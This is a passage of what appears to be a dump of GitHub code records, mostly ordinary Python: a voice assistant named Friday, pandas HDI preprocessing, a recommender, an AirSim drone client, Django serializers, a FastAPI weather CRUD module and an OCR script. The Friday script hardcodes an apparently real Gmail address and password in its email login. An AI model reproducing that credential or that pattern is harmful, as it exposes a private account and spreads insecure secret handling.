= int(datetime.datetime.now().hour)\r\n if hour>=0 and hour<12:\r\n speak(\"Good Morning Sir!\")\r\n\r\n elif hour>=12 and hour<18:\r\n speak(\"Good Afternoon Sir!\")\r\n\r\n else:\r\n speak(\"Good Evening Sir!\")\r\n\r\n speak(\"I am Friday. 
Please tell me how may I help you\")\r\n\r\ndef takeCommand():\r\n #It takes microphone input from the user and returns string output\r\n\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n r.pause_threshold = 0.8\r\n audio = r.listen(source)\r\n\r\n try:\r\n print(\"Recognizing...\")\r\n query = r.recognize_google(audio, language='en-Us')\r\n print(f\"User said: {query}\\n\")\r\n\r\n except Exception as e:\r\n # print(e)\r\n print(\"Say that again please...\")\r\n return \"None\"\r\n return query\r\n\r\ndef sendEmail(to, content):\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.ehlo()\r\n server.starttls()\r\n server.login('hmehedi953@gmail.com', 'm21324611')\r\n server.sendmail('mehedi.mbstu.ict.13@gmail.com', to, content)\r\n server.close()\r\n\r\nif __name__ == \"__main__\":\r\n wishMe()\r\n while True:\r\n # if 1:\r\n query = takeCommand().lower()\r\n\r\n # Logic for executing tasks based on query\r\n if 'wikipedia' in query:\r\n speak('Searching Wikipedia...')\r\n query = query.replace(\"wikipedia\", \"\")\r\n results = wikipedia.summary(query, sentences=2)\r\n speak(\"According to Wikipedia\")\r\n print(results)\r\n speak(results)\r\n\r\n elif 'hay' in query:\r\n speak('Yes Sir, I am here for you...')\r\n\r\n elif 'who are you' in query:\r\n speak('I am Friday! Iron Man updated creation. version 2.0')\r\n\r\n\r\n elif 'hi' in query:\r\n speak('Hi Sir...')\r\n\r\n elif 'nothing' in query:\r\n speak('okay Sir...')\r\n\r\n elif 'how can you help' in query:\r\n speak('I can help you what i have programed Sir!...')\r\n\r\n elif 'what is python' in query:\r\n speak('Python is an interpreted, object-oriented, high-level programming language ...')\r\n\r\n elif 'i love you friday' in query:\r\n speak('I Love You Too Sir! Thank you...')\r\n\r\n elif 'hello friday' in query:\r\n speak('Welcome Home Sir!, I am here for you...')\r\n\r\n elif 'boyfriend' in query:\r\n speak('no Sir!I have no boyfriend Sir! I am here for you...')\r\n\r\n elif 'who create you' in query:\r\n speak('Mehedi hasan created me...')\r\n\r\n elif 'created you' in query:\r\n speak('Mehedi hasan created me...')\r\n\r\n elif 'your boss' in query:\r\n speak('Mehedi hasan...')\r\n\r\n elif 'thank you' in query:\r\n speak('You are welcome Sir..')\r\n\r\n elif 'iron man' in query:\r\n speak(' Iron man is the one who created me.')\r\n speak('He is a legend! I Love Him too!...')\r\n\r\n\r\n elif 'exit' in query:\r\n speak('Okay Sir, I am going to sleep now!...')\r\n speak('I Love you 3000!...')\r\n\r\n elif 'beautiful' in query:\r\n speak('Thank you so much Sir!...')\r\n\r\n elif 'can you sing' in query:\r\n speak('Thank you Sir! 
but I can not sing...')\r\n speak('But I can help you for your song from youtube.can I?..')\r\n\r\n elif 'ok play' in query:\r\n speak('Okay playing Sir!...')\r\n webbrowser.open(\"https://www.youtube.com/watch?v=hHNJSMUgWBM\")\r\n\r\n\r\n elif 'sweet' in query:\r\n speak('Thank you Sir!...')\r\n\r\n elif 'how are you' in query:\r\n speak('I am absulately fine Sir....')\r\n speak('How are you Sir?....')\r\n\r\n\r\n\r\n\r\n\r\n\r\n elif 'open youtube' in query:\r\n speak('Ok Sir, I am opening youtube...')\r\n webbrowser.open(\"https://www.youtube.com/\")\r\n\r\n elif 'open google' in query:\r\n speak('Ok Sir, I am opening google...')\r\n webbrowser.open(\"google.com\")\r\n\r\n elif 'open stackoverflow' in query:\r\n speak('Ok Sir, I am opening stackoverflow...')\r\n webbrowser.open(\"stackoverflow.com\")\r\n\r\n elif 'google map' in query:\r\n speak('Sure Sir! which place do you want to search?')\r\n\r\n elif 'dhaka' in query:\r\n speak('Ok Sir, I am working on it...')\r\n webbrowser.open(\"https://www.google.com/maps/place/Dhaka/@23.7808875,90.2792371,43668m/data=!3m2!1e3!4b1!4m5!3m4!1s0x3755b8b087026b81:0x8fa563bbdd5904c2!8m2!3d23.810332!4d90.4125181\")\r\n speak('Here it is! ')\r\n\r\n\r\n\r\n\r\n elif 'play music' in query:\r\n speak('Ok Sir, I am playing music for you...')\r\n music_dir = 'E:\\\\Alan'\r\n songs = os.listdir(music_dir)\r\n print(songs)\r\n os.startfile(os.path.join(music_dir, songs[0]))\r\n\r\n elif 'time' in query:\r\n strTime = datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n speak(f\"Sir, the time is {strTime}\")\r\n\r\n elif 'open code' in query:\r\n codePath = \"C:\\\\Users\\\\MEHEDI\\\\Desktop\\\\Jervis\"\r\n os.startfile(codePath)\r\n\r\n elif 'mail' in query:\r\n try:\r\n speak(\"What should I say?\")\r\n content = takeCommand()\r\n to = \"mehedi.mbstu.ict.13@gmail.com\"\r\n sendEmail(to, content)\r\n speak(\"Email has been sent!\")\r\n except Exception as e:\r\n print(e)\r\n speak(\"Sorry Sir. 
I am not able to send this email\")\r\n","repo_name":"Mehedi16009/Ironman-Assistant-Friday","sub_path":"friday.py","file_name":"friday.py","file_ext":"py","file_size_in_byte":6002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43244328403","text":"# -*- coding: utf-8 -*-\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndftab1 = pd.read_csv(\"tab1.csv\")\r\n\r\nid_ = list(dftab1.iloc[0:1,0:5].columns.values)\r\nvalues_ = list(dftab1.iloc[0:1,5:].columns.values)\r\n\r\ndftab1_melt = pd.melt(dftab1, id_vars = id_, value_vars = values_)\r\n\r\ndftab1_melt['rowindex'] = dftab1_melt['iso3'].apply(str) + ',' +dftab1_melt['country_name'].apply(str) + ',' + dftab1_melt['variable'].apply(str)\r\ndftab1_melt['columnindex'] = dftab1_melt['dimension'].apply(str)+',' +dftab1_melt['indicator_id'].apply(str)+','+dftab1_melt['indicator_name'].apply(str)\r\n\r\ndftab1_melt_pivot = dftab1_melt.pivot(index='rowindex',\r\n columns = 'columnindex',\r\n values = 'value')\r\n\r\ndftab1_melt_pivot.to_csv('dftab1_melt_pivot1.csv', sep = ',', encoding = 'utf-8')\r\n\r\n#list_index = dftab1_melt_pivot.columns.values.astype(str)[np.char.find(dftab1_melt_pivot.columns.values.astype(str), 'index')>0].tolist()\r\n#list_indices = dftab1_melt_pivot.columns.values.astype(str)[np.char.find(dftab1_melt_pivot.columns.values.astype(str), 'indices')>0].tolist()\r\n\r\n#list_index_ = list_index+list_indices\r\n\r\ndf_index = dftab1_melt_pivot.loc[:,['Composite indices,137506,Human Development Index (HDI)',\r\n 'Education,103706,Education index',\r\n 'Health,103206,Life expectancy index',\r\n 'Income/composition of resources,103606,Income index']]\r\n\r\ndf_index_ = df_index[(dftab1_melt_pivot.index.str.find('2012') > 0) | (dftab1_melt_pivot.index.str.find('2017') > 0)]\r\n\r\n\r\ndf_index_.to_csv('df_index_1.csv', sep = ',', encoding = 'utf-8')\r\n","repo_name":"blueetree/HDI","sub_path":"hdi/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38382223238","text":"'''\nCreated on Feb 1, 2017\n\n@author: Pragya\n'''\n\nfrom algos import Recommendation\nfrom algos.Recommendation import pearson_similarity, top_matches, getRecommendations\nfrom algos.ItemBasedRecommendation import transformToProductData,\\\n calculateItemSimilars, getItemRecommendations\n\ncritics = {\n 'Rose':{'Lady in the water': 2.5, 'Snakes on a plane': 3.5, 'Just my luck': 3.0, 'Superman Returns': 3.5, 'You me and dupree': 2.5, 'The night listener':3.0},\n 'Gene':{'Lady in the water': 3.0, 'Snakes on a plane': 3.5, 'Just my luck': 1.5, 'Superman Returns': 5, 'You me and dupree': 3, 'The night listener':3.5},\n 'Michael':{'Lady in the water': 2.5, 'Snakes on a plane': 3, 'Superman Returns': 3.5, 'The night listener':4},\n 'Claudia':{'Snakes on a plane': 3.5, 'Just my luck': 3, 'Superman Returns': 4, 'You me and dupree': 2.5, 'The night listener':4.5},\n 'Mick':{'Lady in the water': 3.0, 'Snakes on a plane': 4, 'Just my luck': 2, 'Superman Returns': 3, 'You me and dupree': 2, 'The night listener': 3},\n 'Jack':{'Lady in the water': 3.0, 'Superman Returns': 5, 'You me and dupree': 3.5},\n 'Toby':{'Snakes on a plane': 4.5, 'Superman Returns': 4, 'You me and dupree': 1}\n }\n\n# print(pearson_similarity(critics, 'Rose', 'Toby'))\n# print(pearson_similarity(critics, 'Gene', 'Toby'))\nprint(\"top matches for Rose\")\nprint(top_matches(critics, 'Rose', 
5))\nprint(\"get recommendations for Toby\")\nprint(getRecommendations(critics, \"Toby\"))\n\nprint(\"transform to a item based list\")\nresult = transformToProductData(critics)\nprint(result)\n\nprint(\"calculate item similarities\")\nitemSimilars = calculateItemSimilars(result)\nprint(itemSimilars)\n\nprint(\"get item recommendations\")\nprint(getItemRecommendations(critics, itemSimilars, \"Toby\"))","repo_name":"saxenapragya8/MLAlgorithms","sub_path":"algos/RecommendationRunner.py","file_name":"RecommendationRunner.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12315275995","text":"from PythonClient import *\nimport time\n\nclass Vehicle(AirSimClient):\n\n VelocityDuration = 1000000\n\n def __init__(self, ip = \"\"):\n super().__init__()\n super().confirmConnection()\n super().enableApiControl(True)\n if super().armDisarm(True):\n print('connect succeed!')\n self.homeGps = super().getHomeGeoPoint() \n self.updateState() \n self.stateEmergencyChange = False \n pass\n \n def updateState(self):\n self.position = super().getPosition()\n self.velocity = super().getVelocity()\n self.orientation = super().getOrientation()\n self.slefGPS = super().getGpsLocation()\n self.collision = super().getCollisionInfo()\n self.rollPitchYaw = super().getRollPitchYaw()\n \n def accelerate(self, acc, duration): \n start = 0.0 \n self.updateState()\n startVelocity = self.velocity \n if duration < 0.1:\n acc = acc*(duration/0.1)\n duration = 0.1\n while start List[List[str]]:\n h = {}\n for word in strs:\n # アナグラムをソートして、同じ文字に変換する\n sortedWord = ''.join(sorted(word))\n # 辞書に登録していない文字列であれば登録して、すでに登録済みであればそのキーに追加する。\n if sortedWord not in h:\n h[sortedWord] = [word]\n else:\n h[sortedWord].append(word)\n\n # 辞書にキー毎にまとめたvaluesを提出用にfinalの配列にまとめる\n final = []\n for value in h.values():\n final.append(value)\n return final\n","repo_name":"mizutaninaoki/AtCoderPractice","sub_path":"z_snipets/文字列問題/配列の中の複数の文字列をアナグラム毎にグループ分け���る.py","file_name":"配列の中の複数の文字列をアナグラム毎にグループ分けする.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69954180329","text":"\n\n# Press the green button in the gutter to run the script.\nfrom src.dominio import Avaliador, Leilao, Usuario, Lance\n\nif __name__ == '__main__':\n gui = Usuario('Gui')\n yuri = Usuario('Yuri')\n\n lance_do_yuri = Lance(yuri, 100.0)\n lance_do_gui = Lance(gui, 150.0)\n\n leilao = Leilao('Celular')\n\n leilao.lances.append(lance_do_yuri)\n leilao.lances.append(lance_do_gui)\n\n\n avaliador = Avaliador()\n avaliador.avalia(leilao)\n\n print(f'Maior lance: {avaliador.maior_lance}')\n print(f'Menor lance: {avaliador.menor_lance}')\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"ebwang/switchblade","sub_path":"tdd_python/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70141858409","text":"import time\nfrom tkinter import *\n\ntk = Tk()\ncanvas = Canvas(tk, height=200, width=400)\ncanvas.pack()\ncanvas.create_polygon(10, 10, 10, 60, 50, 35)\nfor _ in range(60):\n canvas.move(1, 5, 2)\n tk.update()\n time.sleep(0.1)\n\nfor _ in range(60):\n canvas.move(1, -5, -2)\n tk.update()\n 
time.sleep(0.1)\n","repo_name":"giorno39/tkinter_ex","sub_path":"first_ex/chervena_pitanka_nad_zad_1.py","file_name":"chervena_pitanka_nad_zad_1.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73721182887","text":"from atelier.invlib import setup_from_tasks\n\nns = setup_from_tasks(\n globals(), \"lino\",\n # tolerate_sphinx_warnings=True,\n languages=\"en de fr et nl pt-br es zh-hant bn\".split(),\n doc_trees=[],\n blogref_url='https://luc.lino-framework.org',\n revision_control_system='git',\n locale_dir='lino/locale')\n","repo_name":"lino-framework/lino","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"26532065769","text":"import requests\nimport datetime as dt\nimport os\n\nfrom sqlalchemy.orm import Session\nfrom dotenv import load_dotenv\n\nfrom . import models, schemas\n\n\nload_dotenv(dotenv_path='.env')\nAPPID = os.getenv('APPID')\n\n# Вспомогательные функции\n# 1. Подсчет количества городов в БД\ndef count_cities(db: Session) -> int:\n return db.query(models.City).count()\n\n\n# 2. Получение city.id по названию города (city.name)\ndef get_city_id(db: Session, city_name: str) -> int:\n \"\"\"Returns id (int) of the given city name (str).\"\"\"\n return db.query(models.City).filter(models.City.name == city_name).first().id\n\n\n# 3. Подсчет среднего значения заданного параметра (column_name) для определенного города\ndef count_avg(db: Session, city_id: int, column_name: str):\n \"\"\"Returns key-value (dict). Key - avg_. Value - average value of the given parameter (column).\"\"\"\n query = db.execute(\n f\"\"\"\n SELECT AVG({column_name}) as avg_{column_name}\n FROM weather_info \n WHERE city_id = {city_id}\n \"\"\"\n ).first()\n return query\n \n\n# 5. Функция поиска города на openweather. Возвращает координаты города в виде словаря\ndef city_coordinates(city_name: str):\n \"\"\"If the city is in openweather.com then returns its' coordinates {'lan': .., 'lat': ..}, otherwise returns None\"\"\"\n url = 'http://api.openweathermap.org/geo/1.0/direct?'\n params = {\n 'q': city_name,\n 'appid': APPID,\n }\n response = requests.get(url=url, params=params).json()\n if city_name.title() in response[0]['name']:\n return {\n 'lat': response[0]['lat'],\n 'lon': response[0]['lon']\n }\n\n\n# 6. Возврат списка городов\ndef city_list(db: Session):\n \"\"\"Returns a list of all cities in database\"\"\"\n return db.query(models.City).all()\n \n\n# 7. Проверка наличия города в базе данных\ndef city_in_db(db: Session, city_name: str) -> bool:\n \"\"\"Checks if city is already in the database\"\"\"\n db_city_check = db.query(models.City).filter_by(name=city_name).first()\n if db_city_check == None:\n return False\n return True\n\n\n# Целевые функции\n# 1. 
Возвращает список существующих городов с последней записанной температурой\ndef get_last_weather(db: Session, search: str | None):\n query = []\n if search != None:\n query.append(db.execute(\n f\"\"\"\n SELECT * \n FROM weather_info \n WHERE city_name LIKE '%{search.capitalize()}%'\n ORDER BY date_time DESC \n \"\"\").first())\n\n else: \n city_ids = [x['id'] for x in db.query(models.City.id).all()]\n for id in city_ids:\n query.append(db.execute(\n f\"\"\"\n SELECT * \n FROM weather_info \n WHERE city_id = {id}\n ORDER BY date_time DESC \n \"\"\").first())\n return query\n\n# def get_last_weather(db: Session):\n# city_names = [x['name'] for x in db.query(models.City.name).all()]\n# query = []\n# for name in city_names:\n# query.append(db.execute(\n# f\"\"\"\n# SELECT * \n# FROM weather_info \n# WHERE city_name = {name}\n# ORDER BY date_time DESC \n# \"\"\").first())\n# return query\n\n\n# 2. По заданному городу возвращает все данные за выбранный период, а также их средние значения за этот период\ndef get_city_stats(\n db: Session, \n city: str, \n date_time_start=dt.datetime(year=2023, month=1, day=1), \n date_time_end=dt.datetime.now()\n ):\n city_id = get_city_id(db=db, city_name=city.title())\n\n records = db.query(models.WeatherInfo).filter(\n models.WeatherInfo.city_id == city_id, \n date_time_start <= models.WeatherInfo.date_time,\n date_time_end >= models.WeatherInfo.date_time\n ).all()\n average_values = {\n **count_avg(db=db, city_id=city_id, column_name='temperature'),\n **count_avg(db=db, city_id=city_id, column_name='atm_pressure'),\n **count_avg(db=db, city_id=city_id, column_name='wind_speed')\n }\n return {'average_valus': average_values, 'records': records, }\n \n\n# 3. Добавляет город в БД, если он есть на openweather\ndef add_city(db: Session, city: str):\n coord = city_coordinates(city_name=city)\n if coord != None:\n lat = coord['lat']\n lon = coord['lon']\n db_city = models.City(name=city.title(), lat=lat, lon=lon)\n db.add(db_city)\n db.commit()\n db.refresh(db_city)\n return db_city\n\n","repo_name":"Juslow/fastapi_scrapy","sub_path":"db/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25608457066","text":"\r\ndef fib1(n):\r\n '''\r\n Prints out all fibonacci numbers less than or equal to the given number.\r\n\r\n Keyword arguments:\r\n\r\n n -- Upper limit of the fibonacci sequence\r\n\r\n Returns: nothing\r\n '''\r\n a, b = 0, 1\r\n while a < n:\r\n print(a)\r\n a, b = b, a+b\r\n print()\r\n\r\n\r\ndef fib2(n):\r\n a, b = 0, 1\r\n result = []\r\n while a < n:\r\n result.append(a)\r\n a, b = b, a+b\r\n return result\r\n\r\nif __name__ == '__main__':\r\n print('whatchu doin here m8 git out ya cant')\r\n fib1(1000)","repo_name":"NukaDuka/Code-repository","sub_path":"fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19546477443","text":"import time\n\nimport cv2\nimport pytesseract\n\n\ndef read_text(file,name):\n pytesseract.pytesseract.tesseract_cmd = 'C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe'\n img = cv2.imread(file)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n ret, thresh1 = cv2.threshold(gray, 0, 255, cv2.THRESH_OTSU | cv2.THRESH_BINARY_INV)\n rect_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (18, 18))\n dilation = cv2.dilate(thresh1, rect_kernel, iterations=1)\n contours, 
hierarchy = cv2.findContours(dilation, cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_NONE)\n im2 = img.copy()\n file = open(name + \".txt\", \"w+\")\n file.write(\"\")\n file.close()\n for cnt in contours:\n x, y, w, h = cv2.boundingRect(cnt)\n\n # Drawing a rectangle on copied image\n rect = cv2.rectangle(im2, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n # Cropping the text block for giving input to OCR\n cropped = im2[y:y + h, x:x + w]\n\n # Open the file in append mode\n file = open(name + \".txt\", \"a\")\n\n # Apply OCR on the cropped image\n text = pytesseract.image_to_string(cropped)\n\n # Appending the text into file\n file.write(text)\n file.write(\"\\n\")\n\n # Close the file\n file.close\n\n","repo_name":"grimok/ITDepremYardim","sub_path":"textdetection.py","file_name":"textdetection.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22191202048","text":"from datetime import MAXYEAR, MINYEAR\n\nfrom django.utils import timezone\nfrom rest_framework import serializers\n\n\nclass YearListMonthSerializer(serializers.Serializer):\n year = serializers.IntegerField(\n label=\"Год\",\n min_value=1970,\n max_value=timezone.now().year,\n help_text=\"Максимальный год равен текущему году\",\n )\n months = serializers.ListSerializer(\n child=serializers.IntegerField(\n label=\"Месяц\",\n min_value=1,\n max_value=12,\n ),\n label=\"Месяцы\",\n )\n\n\nclass YearSerializer(serializers.Serializer):\n \"\"\"Сериализатор параметра year.\"\"\"\n\n year = serializers.IntegerField(\n min_value=MINYEAR + 1,\n max_value=MAXYEAR,\n required=False,\n )\n\n\nclass YearMonthSerializer(YearSerializer):\n \"\"\"Сериализатор параметров year и month.\"\"\"\n\n month = serializers.IntegerField(\n min_value=1,\n max_value=12,\n required=False,\n )\n","repo_name":"Studio-Yandex-Practicum/Lubimovka_backend","sub_path":"apps/articles/serializers/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"ru","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"73856176488","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nimport sys\nfrom DataOpenCV import *\nfrom ImageViewer import *\nfrom defaultImage import defaultData\nfrom pyqtgraph import ImageView\n\n\nclass ImageLayout(QWidget):\n \"\"\"\n ImageLayout: a QWidget containing the label, OPEN button, the image viewer and the components viewer\n :param index: the index of the image layout. 
First: 0, Second: 1\n logger: the logger of the main application\n :arg data: the ImageData class\n selected: shows if ImageViewer is occupied with data or not\n index: the index of imageLayout\n selectedSize: if the image is selected set the size to compare with the other image\n imageLayout: the main layout of the image\n \"\"\"\n sendData = pyqtSignal(list)\n setSize = pyqtSignal(list)\n\n\n def __init__(self, index, logger):\n super().__init__()\n\n\n self.data = None\n self.selected = False\n self.index = index\n self.selectedSize = None\n self.logger = logger\n self.imageLayout = QVBoxLayout()\n self.setLabelUI()\n self.setImageUI()\n\n\n self.setFixedSize(850, 450)\n self.setLayout(self.imageLayout)\n\n def setLabelUI(self):\n \"\"\"\n setLabelUI initiates the UI of the labelLayout that contains the image label, component comppbox and the open\n button\n :param: self\n :return: None\n \"\"\"\n\n labelLayout = QHBoxLayout()\n\n\n self.nameLabel = QLabel(\"IMAGE \"+str(self.index+1))\n self.nameLabel.setStyleSheet(\"font-size: 16px\")\n labelLayout.addWidget(self.nameLabel)\n\n self.combobox = QComboBox()\n self.combobox.setStyleSheet(\"font-size: 16px\")\n self.combobox.addItem(\"Magnitude\")\n self.combobox.addItem(\"Phase\")\n self.combobox.addItem(\"Real\")\n self.combobox.addItem(\"Imaginary\")\n labelLayout.addWidget(self.combobox)\n self.combobox.setEnabled(False) # When the image is not shown, make the component combobox disabled\n self.combobox.activated[str].connect(self.showComponent)\n\n openButton = QPushButton(\"Open\")\n openButton.clicked.connect(self.openImage)\n labelLayout.addWidget(openButton)\n\n\n labelBox = QGroupBox()\n labelBox.setFixedHeight(45)\n labelBox.setLayout(labelLayout)\n self.imageLayout.addWidget(labelBox)\n\n def setImageUI(self):\n \"\"\"\n setImageUI: sets the ui of the image by adding 2 ImageViewer Classes one for the image itself and the other for the\n component layout\n :param self\n :return none\n \"\"\"\n imageViewerLayout = QHBoxLayout()\n\n\n self.imageLabel = ImageViewer()\n data = defaultData() # defaultData returns data of the opening image\n self.imageLabel.image.setImage(data)\n\n\n imageViewerLayout.addWidget(self.imageLabel)\n\n self.componentLabel = ImageViewer()\n data = defaultData()\n self.componentLabel.image.setImage(data)\n\n\n\n imageViewerLayout.addWidget(self.componentLabel)\n\n imageViewerBox = QGroupBox()\n imageViewerBox.setLayout(imageViewerLayout)\n self.imageLayout.addWidget(imageViewerBox)\n\n\n def openImage(self):\n \"\"\"\n openImage: opens a OpenFileDialog which returns the path of the image. Then gets the data using getImageData fn.\n make sure of some conditions regarding the size and if everthing is right, show the image. else, show an error message\n :param self\n :return: none\n \"\"\"\n message = \"OPEN button for image \"+str(self.index+1)+\" is clicked.\"\n self.logger.debug(message)\n\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n path, _ = QFileDialog.getOpenFileName(self, \"Open Image\", \"\",\n \"Images Files (*.jpg *.jpeg)\", options=options)\n\n if path:\n name = self.getFileName(path)\n\n data = getImageData(path)\n\n\n if self.selectedSize == None:\n # Here, there was no image selected. 
So show the image and set the size\n self.data = data\n self.imageLabel.image.setImage(self.data.data.T, scale=(400, 400))\n self.componentLabel.image.setImage(self.data.magPlot.T, scale=(400, 400))\n self.selected = True\n self.combobox.setEnabled(True)\n self.sendImageSize()\n self.nameLabel.setText(\"Image {}: {}\".format(self.index+1, name))\n self.selectedSize = [self.data.width, self.data.height]\n firstImageSelected = \"Image {}: {} is selected and shown\".format(self.index+1, name)\n self.logger.debug(firstImageSelected)\n self.sendDataFunction()\n # print(self.data.width, self.data.height)\n\n else:\n # Now, there is already a chosen image, so we have to check the size of new image that it is compatible\n # with the first image.\n if self.selectedSize[0] == data.width and self.selectedSize[1] == data.height:\n self.data = data\n self.imageLabel.image.setImage(self.data.data.T, scale=(400, 400))\n self.componentLabel.image.setImage(self.data.magPlot.T, scale=(400, 400))\n self.nameLabel.setText(\"Image {}: {}\".format(self.index + 1, name))\n self.selected = True\n self.combobox.setEnabled(True)\n self.sendDataFunction()\n complementIndex = self.complementIndex(self.index)\n secondImageSelected = \"Image {} is selected and it does have the same size as image {}\"\\\n .format(self.index+1, complementIndex+1)\n self.logger.debug(secondImageSelected)\n print(self.data.width, self.data.height)\n else:\n # Now, the new image is NOT compatible with the first chosen image. Then, an error message is show to\n # either select another image or press RESET if he/she to work on this image\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Critical)\n msg.setText(\"Please select an image with the same size as the already selected.\" +\n \" Please press RESET if you want to work on this image\")\n msg.setWindowTitle(\"Error\")\n msg.exec_()\n complementIndex = self.complementIndex(self.index)\n sizeErrorMessage = \"You have selected an image that doesn't have the same size as Image \" + str(complementIndex+1)\n self.logger.warning(sizeErrorMessage)\n\n else:\n cancelMessage = \"The open was closed without selecting the image\"\n self.logger.debug(cancelMessage)\n\n\n\n def showComponent(self, comp):\n \"\"\"\n showCompoenent: depending on the component selected. 
the component image viewer shows it.\n :param comp: comp: ('Magnitude', 'Phase', 'Real', 'Imaginary')\n :return: None\n \"\"\"\n if comp == \"Magnitude\":\n arr = self.data.magPlot.T\n elif comp == \"Phase\":\n arr = self.data.phasePlot.T\n elif comp == \"Real\":\n arr = self.data.realPlot.T\n elif comp == \"Imaginary\":\n arr = self.data.imgPlot.T\n componentViewChanged = \"Now Showing the {} component of image {}\".format(comp, self.index+1)\n self.logger.debug(componentViewChanged)\n self.componentLabel.image.setImage(arr, scale=(400, 400))\n\n @pyqtSlot()\n def sendDataFunction(self):\n \"\"\"\"\n sendDataFunction: a signal that is emitted when an image is selected successfully and sends its ImageData class\n to the OutputLayout class.\n \"\"\"\n sendList = [self.index, self.data]\n self.sendData.emit(sendList)\n print(\"Sent Here\")\n\n def reset(self):\n \"\"\"\"\n reset: when RESET button is clicked, everything is back to the opening state to work on other images.\n \"\"\"\n data = defaultData()\n self.imageLabel.image.setImage(data)\n self.componentLabel.image.setImage(data)\n self.selectedSize = None\n\n @pyqtSlot()\n def sendImageSize(self):\n \"\"\"\n sendImageSize: a signal that is emitted when image is set to send its size to the other ImageLayoyut widget\n :return: None\n \"\"\"\n imageSize = [self.data.width, self.data.height]\n sizeSetMessage = \"Size set to {}x{}\".format(imageSize[0], imageSize[1])\n self.logger.debug(sizeSetMessage)\n self.setSize.emit(imageSize)\n print(\"Size Set\")\n\n @pyqtSlot(list)\n def setImageSize(self, size):\n \"\"\"\n setImageSize: if this image doesn't have a selectedSize, then, this will tell it that an image is selected and\n sets its size to selectedSize\n :param size: the size list sent by sendImageSize signal.\n :return: None\n \"\"\"\n if self.selectedSize == None:\n self.selectedSize = size\n print(\"Size Recieved\")\n\n @staticmethod\n def complementIndex(index):\n \"\"\"\n complementIndex takes the index and return its complement (The other index)\n :param index: the index selected\n :return int (0, 1): the other index\n \"\"\"\n if index == 1:\n return 0\n elif index == 0:\n return 1\n\n def getFileName(self, path):\n \"\"\"\n getFileName gets the file name out of its path\n :param path: the path of the file as it contains the file name\n :return: the name of the file\n \"\"\"\n return path.split('.')[-2].split('/')[-1]\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n win = ImageLayout(0)\n win.show()\n sys.exit(app.exec_())\n","repo_name":"AhmedKhaled8/ImageComponentsMixer","sub_path":"ImageLayout.py","file_name":"ImageLayout.py","file_ext":"py","file_size_in_byte":10070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24832179448","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 24 10:20:07 2022\n\n@author: Zheng Zhu\n\"\"\"\n\nimport library as lb\nimport parameters as ps\n\n\ndef constant_feature_drop(df):\n\n df = (df.loc[:, (df != df.iloc[0]).any()])\n\n df_constant_features = lb.pd.DataFrame(list((df.loc[:, (df == df.iloc[0]).all()]).columns), columns = ['constant_features_drop'])\n \n return (df, df_constant_features)\n\n\ndef missing_value_feature_drop(df, treshold):\n\n all_features_list = list(df.columns)\n\n df = df.dropna(thresh= (1.0-treshold)*len(df), axis=1)\n\n missing_value_features_list = [feature for feature in all_features_list if feature not in list(df.columns)]\n\n df_missing_value_features = 
